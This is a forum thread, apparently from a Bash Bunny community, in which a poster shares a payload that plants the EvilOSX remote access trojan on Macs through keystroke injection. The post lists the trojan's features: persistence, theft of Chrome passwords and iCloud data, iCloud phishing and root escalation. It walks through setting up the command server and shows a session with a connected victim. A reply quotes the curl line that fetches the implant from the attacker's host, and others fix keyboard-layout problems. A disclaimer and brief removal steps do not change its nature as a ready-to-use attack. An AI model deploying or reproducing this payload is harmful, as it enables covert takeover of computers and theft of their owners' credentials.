Jump to content
stekole

[PAYLOAD] untitled_EVILOSX

Recommended Posts

Please check git for the latest README/code

https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX

 

untitled_EVILOSX

 +  ______       _  _   ____    _____ __   __ 
 + |  ____|     (_)| | / __ \  / ____|\ \ / /
 + | |__ __   __ _ | || |  | || (___   \ V / 
 + |  __|\ \ / /| || || |  | | \___ \   > <  
 + | |____\ V / | || || |__| | ____) | / . \ 
 + |______|\_/  |_||_| \____/ |_____/ /_/ \_\\
 + untitled_ bash bunny edition    /   stekole

** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. **

Features

  • Client reconnects automatically/persistence
  • ECM_ETHERNET and HID attack
  • Emulate a simple terminal instance.
  • Sockets are encrypted with CSR via OpenSSL.
  • No dependencies (pure python).
  • Retrieve Chrome passwords.
  • Retrieve iCloud contacts.
  • Attempt to get iCloud password via phishing.
  • Show local iOS backups.
  • Download and upload files.
  • Retrieve find my iphone devices.
  • Attempt to get root via local privilege escalation (<= 10.10.5).
  • Auto installer

Configuration

Server

To prep your server you will need to download and follow the install instructions from EVILOSX.

On your server, download the EvilOSX code and run your server.

    git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX
    ./Server 

and type your listening port (1337)

Client

Before you deploy your bash bunny, update your configuration in the EvilOSX.py file

At the bottom of the file you will see a server and port variable

Set these to your server IP and listening port 

  #########################
  SERVER_HOST = "10.99.99.16"
  SERVER_PORT = 1337
  #########################

Usage

Plug in your bash bunny and wait until the script has finished running.

You should see the client connect to the server

root@kali:~/git/EvilOSX# ./Server.py 
  ______       _  _   ____    _____ __   __
 |  ____|     (_)| | / __ \  / ____|\ \ / /
 | |__ __   __ _ | || |  | || (___   \ V / 
 |  __|\ \ / /| || || |  | | \___ \   > <  
 | |____\ V / | || || |__| | ____) | / . \ 
 |______|\_/  |_||_| \____/ |_____/ /_/ \_\
 
[?] Port to listen on: 1337
[I] Type "help" to get a list of available commands.
> help
help              -  Show this help menu.
status            -  Show debug information.
clients           -  Show a list of clients.
connect <ID>      -  Connect to the client.
exit              -  Close the server and exit.
> clients
[I] 1 client(s) available:
    0 = client_hostname
> connect 0
[I] Connected to "client_hostname", ready to send commands.

Some of the other features can be found in the help menu. I have not tried them all

help              -  Show this help menu.
status            -  Show debug information.
clients           -  Show a list of clients.
connect <ID>      -  Connect to the client.
get_info          -  Show basic information about the client.
get_root          -  Attempt to get root via local privilege escalation.
download <path>   -  Downloads the file to the local machine.
upload <path>     -  Uploads the file to the remote machine.
chrome_passwords  -  Retrieve Chrome passwords.
icloud_contacts   -  Retrieve iCloud contacts.
icloud_phish      -  Attempt to get iCloud password via phishing.
itunes_backups    -  Show the user's local iOS backups.
find_my_iphone    -  Retrieve find my iphone devices.
screenshot        -  Takes a screenshot of the client.
kill_client       -  Brutally kill the client (removes the server).
exit              -  Exits the session.
Any other command will be executed on the connected client.

Removal of Tool

The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory

rm -rf ~/Library/Containers/.EvilOSX/
launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist

Defence

  • disable the command-space short key for spotlight or disable spotlight all together if not needed

Todo

Issues

  • I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py

Run ./BUILDER and enter the appropriate information:

687474703a2f2f692e696d6775722e636f6d2f4e

After, copy this to your switch payload

Thanks

 

 

Share this post


Link to post
Share on other sites

Damn! I have been waiting for something like this. So AWESOME! Unfortunately it doesent work for me right know because of the keyboard file is wrong for Mac OS on the Swedish pro keyboard, not your problem. Keep it up!

Edited by RazerBlade

Share this post


Link to post
Share on other sites

The payload works. I used with different mac -  Keyboard --> ITALIAN Lang.

You have just to modify the character output in the file payload.txt

EXAMPLE:

Original string in payload.txt is  --> QUACK STRING curl "http://$HOST_IP/EvilOSX.py" \> "/tmp/.config/s

the command "\>" with Italian KB set reports an error and the script didn't works until I changed  "\>" in "\|" 

QUACK STRING curl "http://$HOST_IP/EvilOSX.py" \| "/tmp/.config/s" 

The command "\>" needs to obtain the symbol "|" that it means run the command...

(I do not know if you understand my report... ahha"

Ciao

Share this post


Link to post
Share on other sites

@Kaos39:

Shouldn't that be solved by setting the right language file in the config.txt of BashBunny (firmware 1.5)? Did you try that? This would be much easier instead on working through all payloads...

Share this post


Link to post
Share on other sites
20 hours ago, GermanNoob said:

@Kaos39:

Shouldn't that be solved by setting the right language file in the config.txt of BashBunny (firmware 1.5)? Did you try that? This would be much easier instead on working through all payloads...

It's only for mac this problem occurs

Share this post


Link to post
Share on other sites
6 minutes ago, RazerBlade said:

It's only for mac this problem occurs

Ah, so we would need an Apple keyboard config file for each language to solve this?

Edited by GermanNoob
added "config file" to be more accurate...

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...